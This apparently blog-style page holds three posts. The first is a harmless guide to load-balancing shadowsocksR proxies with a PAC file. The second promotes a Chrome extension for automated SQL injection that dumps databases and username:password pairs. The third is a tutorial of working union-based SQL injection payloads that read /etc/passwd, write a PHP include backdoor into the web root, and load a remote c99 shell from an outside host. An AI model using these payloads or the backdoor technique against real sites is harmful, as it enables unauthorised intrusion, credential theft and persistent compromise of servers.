connecting to a multiple shadowsocksR/Proxy handlers at the same time for windows

Requirements:
2 or more configurations
shadowsocksR
Notepad/Sublime

Procedure:
First, make a 2 or more copy in shadowsocksR.

go to the first shadowsocksR folder then edit the gui-config.json file using notepad/sublime
find the localPort and change its value to 1080.

Next go to the second shadowsocksR folder then edit the gui-config.json
find the localPort there and change its value to 1081

same procedure for the third shadowsocksR folder but change the localPort  to 1082.
then for the fourth shadowsocksR localPort is 1083.
And so on..
Now you've configured the shadowsocksR folders.
Run each one of them.

Next is configure each shadowsocksR for your manual proxy configuration
example for first shadowsocksR

for second:

And so on.
Now our shadowsocksR are ready,
its time to learn how to make PAC file!

What is PAC file?
PAC stands for "Proxy Auto Configurations" which actually describes itself.
It's used for redirecting for proxies.
This is easy to learn because its syntax is javascript.

So first create a new text file in your hard disk dirve and name it pac.txt

Next edit that pac and create a javascript function named FindProxyForURL with variable url and host.

Now that we've created a function, we need to make an array of our shadowsocks proxies.

Now that we're done for listing our shadowsocks proxies, we need to make the pac script to select one of the ssProxies array randomly.

now the proxy variable could be 127.0.0.1:1080/1081 or 1082. So next we need to return to the client the proxy where to connect.

Full code :

function FindProxyForURL(url, host) {
ssProxies = ["127.0.0.1:1080","127.0.0.1:1081","127.0.0.1:1082"];
proxy = ssProxies[Math.floor(Math.random() * (ssProxies.length))];
return "PROXY " + proxy;
}

And now, we're done! now all we have to do left is to configure our browser and IDM!
go to settings of chrome > Open proxy settings > LAN settings.
Then replicate this setting

It depends where you saved the pac.txt
And now, if everytime you browse, it will randomly connect from one of the shadowsocks!

For how to configure IDM here:


You're welcome.

A powerful chrome extension sql injector made by me.

Download Here

SQL-Injector

A chrome extension for sql injection using Union Based and Error Based

How To Install:

go to chrome://extension then drag and drop the sql injector folder to open it go to the options of the chrome extension.

How To Use:

To use this tool simply put your target url in the url textbox

Put '_INJECTHERE_' (without quotes) where the tool will inject.

Example:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_INJECTHERE_

Click start button and it will start scanning if its vulnerable or not

First the tool will check if the page is changing every visit.

And if it is, you need to take a piece of text that is in normal page.

Example:

website.com/page.php?id=19

Costs: 5 pesos only!

website.com/page.php?id=19'

Costs: only!

You see that the phrase '5 pesos' text disappears.

So you will put that phrase in normalPageKeyword and click start again.

Then after that, the tool will check if there's difference between the normal page and the errored page (the url with quote id=19')

And if normal page is the same as error page, then maybe its not vulnerable so you gotta find another target url.

Then if its not the same as error page, then the tool will now try to get the right comment

There are different types of comment depending on sql syntax:

'--+

--

#

)--+

')--+

"--+

etc..

If the tool cannot find the right comment, you may need to get the right comment by yourself and put it in the comment text box

For example the right comment is " '--+ " then you need to put " '_PAYLOAD--+ " in the comment textbox then click start again

Then the tool will start trying to get the vulnerable columns

it will try to use order by and group by method.

if the tool can't then you gotta count it by yourself and put it in numberOfColumns textbox.

Then the tool will start trying to get the injectable columns

if the tool can't then you gotta get it by yourself and put it in injectableColumn textbox.

Now if you have the comment type, number of columns and injectable columns.

You can now start gathering informations.

First lets try clicking getting version, user and currentDB

After that click [GET] button in database panel.

It will dump the database names, if you already have the database name you can put it in addDatabase textbox then click '>' button

Then select the database you want then click [GET] in the table panel to get the tables.

Same as the columns.

After that you will now dump the datas

You can select multiple columns that you want to dump

for example:

you choosed username column and password column

it will be username,0x3a,passwword

the 0x3a is ':' to seperate the username and password

result: admin:admin123,test1:testing123,z3r:z3r19

SQL Injection Uploading shell using root file privileges 70% Noob

!! FOR EDUCATIONAL PURPOSES ONLY  !!

I Introduction
So today i'm gonna teach you how to upload shell using SQL Injection

II Getting User
So first, get the user using
user()
Or
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

www.website.com/news.php?id=19' and false union select 1,user(),3,4,5,6,7,8,9--+

www.website.com/news.php?id=19' and false union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8,9--+

if the user is root or the user privilleges is Y or Yes then you're good go.

III Getting the Full Path Disclosure
I've written a tutorial how to get the Full Path Disclosure here.

Note : that if you can't get the Full Path Disclosure, there's no way you can upload your shell if you don't know where to save your backdoor shell.

Tips: Getting Full Path Disclosure

for some tips if you really want to know the FPD, try reading the server's "/etc/passwd" using load_file().

www.website.com/news.php?id=19' and false union select 1,load_file("/etc/passwd"),3,4,5,6,7,8,9--+

or if you still can't try guessing the FPD. The commons are "/var/www/" ,"/var/www/sitename" and etc..

to make sure that they're correct try "/var/www/index.php" and visit www.website.com/index.php then check if the source code is similar or the same.

IV Uploading the shell
Now that we have the full path disclosure, we can now try uploading the shell. We'll gonna use this script for our backdoor initiator:

<?php include $_GET["inc"];?>

www.website.com/news.php?id=19' and false union select 1,'<?php include($_GET["inc"]);?>',3,4,5,6,7,8,9 into outfile '/var/www/shell.php'--+
So once we visit that url, we will now go here:

www.website.com/shell.php?inc=http://examplebackdoorwebsite.com/c99.txt

And wollah! You have successfully inserted a php backdoor in the website!

if its 404 not found, then maybe the directory is not writable. You gotta find some directories that is writable.
The common writable directories are:
/uploads/
/images/
/videos/
or something like that.

V Goodbye
Hope you learned something with my tutorial! I guess it's your job to enhance and explore. Good luck and have fun hacking!!